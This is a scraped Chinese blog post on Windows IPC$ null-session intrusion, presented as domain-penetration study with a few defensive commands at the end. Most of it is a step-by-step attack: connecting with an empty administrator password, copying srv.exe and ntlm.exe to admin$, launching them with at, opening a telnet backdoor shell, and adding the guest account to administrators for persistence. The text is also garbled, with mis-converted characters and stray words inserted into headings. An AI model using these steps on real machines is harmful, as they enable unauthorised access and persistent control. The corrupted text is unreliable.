域渗透学习预备知识-IPC$的入侵防护

1、什么是IPC$html

如下段落引文自:http://www.xfocus.net/articles/200303/493.html  shell

IPC$(Internet Process Connection)是共享"命名管道"的资源(你们都是这么说的),它是为了让进程间通讯而开放的命名管道,能够经过验证用户名和密码得到相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$,链接者甚至能够与目标主机创建一个空的链接而无需用户名与密码(固然,对方机器必须开了ipc$共享,不然你是链接不上的),而利用这个空的链接,链接者还能够获得目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。咱们总在说ipc$漏洞ipc$漏洞,其实,ipc$并非真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登录功能,并且还打开了默认共享,即全部的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。全部的这些,初衷都是为了方便管理员的管理,但好的初衷并不必定有好的收效,一些别有用心者(究竟是什么用心?我也不知道,代词一个)会利用IPC$,访问共享资源,导出用户列表,并使用一些字典工具,进行密码探测,寄但愿于得到更高的权限,从而达到不可告人的目的。windows

2、IPC$入侵防护基础:网络

0、操做环境:工具

 powershell 管理员spa

一、如何创建IPC$空链接:.net

1 net use \\127.0.0.1\ipc$"" /user:""

二、创建完整的用户名称密码的链接:code

1 net use \\127.0.0.1\ipc$"password" /user:"username"

三、映射路径:htm

1 net use z: \\IP\c$ "密码" /user:"用户名"       (便可将对方的c盘映射为本身的z盘,其余盘类推)

四、直接访问和删除路径:blog

1 net use z: \\IP\c$ #直接访问
2 net use c: /del 删除映射的c盘,其余盘类推 
3 net use * /del 删除所有,会有提示要求按y确认

五、删除链接:

1 net use \\IP\ipc$ /del

六、引用上文地址博客的一段经典例子:

 1 ###经典入侵模式###
 2 这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创做者!(不知道是哪位前辈) 
 3 
 4 1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators" 
 5 这是用《流光》扫到的用户名是administrators,密码为""的IP地址(空口令?哇,运气好到家了),若是是打算攻击的话,就能够用这样的命令来与127.0.0.1创建一个链接,由于密码为"",因此第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令便可成功完成。
 6   
 7 2. C:\>copy srv.exe \\127.0.0.1\admin$ 
 8 先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,你们还可使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
 9   
10 3. C:\>net time \\127.0.0.1 
11 查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
12   
13 4. C:\>at \\127.0.0.1 11:05 srv.exe 
14 用at命令启动srv.exe吧(这里设置的时间要比主机时间快,否则你怎么启动啊,呵呵!) 
15   
16 5. C:\>net time \\127.0.0.1
17 再查查到时间没有?若是127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
18   
19 6. C:\>telnet 127.0.0.1 99 
20 这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,可是咱们使用的是SRV在对方计算机中为咱们创建一个99端口的Shell。
21 虽然咱们能够Telnet上去了,可是SRV是一次性的,下次登陆还要再激活!因此咱们打算创建一个Telnet服务!这就要用到ntlm了
22   
23 7.C:\>copy ntlm.exe \\127.0.0.1\admin$
24 用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
25   
26 8. C:\WINNT\system32>ntlm 
27 输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm实际上是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。而后使用"net start telnet"来开启Telnet服务! 
28 
29 9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操做就像在DOS上操做同样简单!(而后你想作什么?想作什么就作什么吧,哈哈)
30 
31 为了以防万一,咱们再把guest激活加到管理组    
32 10. C:\>net user guest /active:yes 
33 将对方的Guest用户激活
34 
35 11. C:\>net user guest 1234 
36 将Guest的密码改成1234,或者你要设定的密码
37 
38 12. C:\>net localgroup administrators guest /add 
39 将Guest变为Administrator^_^(若是管理员密码更改,guest账号没改变的话,下次咱们能够用guest再次访问这台计算机)

七、防护命令:

1 net share #查看本身的共享
2 net view \\IP #查看target的共享
3 netstat -A IP 获取target的user列表

八、netstat的延伸使用方法:

netstat -ano | findstr "port" #查看端口号对应的PID
tasklist | findstr "PID" #查看进程号对应的程序
相关文章
相关标签/搜索